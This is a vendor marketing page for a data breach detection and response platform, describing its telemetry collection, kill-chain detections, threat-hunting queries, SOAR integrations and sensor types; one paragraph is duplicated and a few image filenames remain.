DATA BREACH RESPONSE TOOLKIT

Detect, Analyze and Respond Autonomously All In Real-Time

We Collect The Right Data 

The DBRT platform has data collection and processing at the core of its capabilities and at ARC Cyber, we believe that solving the data problem first is key. This is because security analysts struggle with having too much data, not enough data or no context for data. If the data collection problem isn’t solved properly, tools will experience the age-old problem of garbage in / garbage out. ARC DBRT data collection technology is called Interflow.

screen 1.jpg

Interflow is a JSON formatted data record that is normalized, reduced, and enriched with other telemetry to give context to what is occurring. DBRT's family of sensors capture network application data, server process, command, and file data as well as threat intelligence and geo location data. After collected, this data gets fused together to form one record.

We Detect The Real Threats

screen 2.jpg

ARC Cyber’s DBRT enables customized security workbenches to analysts get the tools they want. There are over 50,000 detections for known and unknown behaviors and these detections are mapped to the cybersecurity kill chain to act as an early warning detection system. DBRT, unlike other solutions in the market, has complete kill chain detection because of its rich data collection.

For example, detections at the delivery stage of the kill chain require a malware sandbox, and detections at the exploitation stage require IOS technology. GDF Cyber delivers the tools to detect and respond throughout the kill chain.

The solution also combines legacy technologies such as IOS with machine learning in order to increase fidelity and lower false positives. Machine learning effectively creates a baseline of signatures that normally trigger often and eliminates them from being considered a high-fidelity alert. Machine learning also detects anomalous traffic patterns and server behavior.

Tools That Empower Threat Hunters 

Threat Hunting has quickly become a popular strategy in cyber security operations, and the search for the unknown is as important as the detection of the unknown. With Open XDR, organizations can search its rich dataset for malicious activity by creating simple or complex queries on the fly. It’s like having a Google search engine on your data. For example, an operator can investigate for the execution of Windows

sreen 3.JPG

Powershell commands on a server initiated from public IP addresses that has a pre-existing bad reputation. Another example is an operator wanting to search for a specific file (MOS hash) uploaded to a server on the Internet by a specific user.

After these search queries are created, the operator can then save them and turn them into custom visualizations for future use and have them automatically executed to generate alerts and reports.

Respond Autonomously 

screen 4.JPG

Threat Hunting has quickly become a popular strategy in cyber security operations, and the search for the unknown is as important as the detection of the unknown. With Open XDR, organizations can search its rich dataset for malicious activity by creating simple or complex queries on the fly. It’s like having a Google

search engine on your data. For example, an operator can investigate for the execution of Windows Powershell commands on a server initiated from public IP addresses that has a pre-existing bad reputation. Another example is an operator wanting to search for a specific file (MOS hash) uploaded to a server on the Internet by a specific user.Along with these built-in response capabilities, the platform also has orchestration plugins for SIEMs as well as SOARs such as Demisto, Phantom Cyber, Swimlane and Siemplify. The SIEM plugin streams events and the SOAR plugins allows the platforms detections to automatically trigger playbooks that reside in orchestration products to perform a variety of instructions that could include executing scripts or integrating with adjacent tools.

On-Prem or SaaS Available

The solution is delivered as software that can be installed on your own physical or virtual x86 servers in cloud providers such as AWS, Azure or Google, or purchased as pre-installed hardware appliances.

There are Multiple Components that Create the Total Solution:

  • Network sensors collect network traffic from ethernet switches.

  • Server sensors are installed on Linux

  • and Windows on servers to collect traffic, command, process and file data.

  • Container sensors collect traffic inside container environments.

  • Deception sensors act as honeypots within your environment.

  • Virtual appliance sensors can be deployed inside KVM, VMWare and HyperV environments.

  • Data Processor nodes are deployed and can be clustered together to create a scalable big data platform for data storage and analytics.

XDR Componanta.png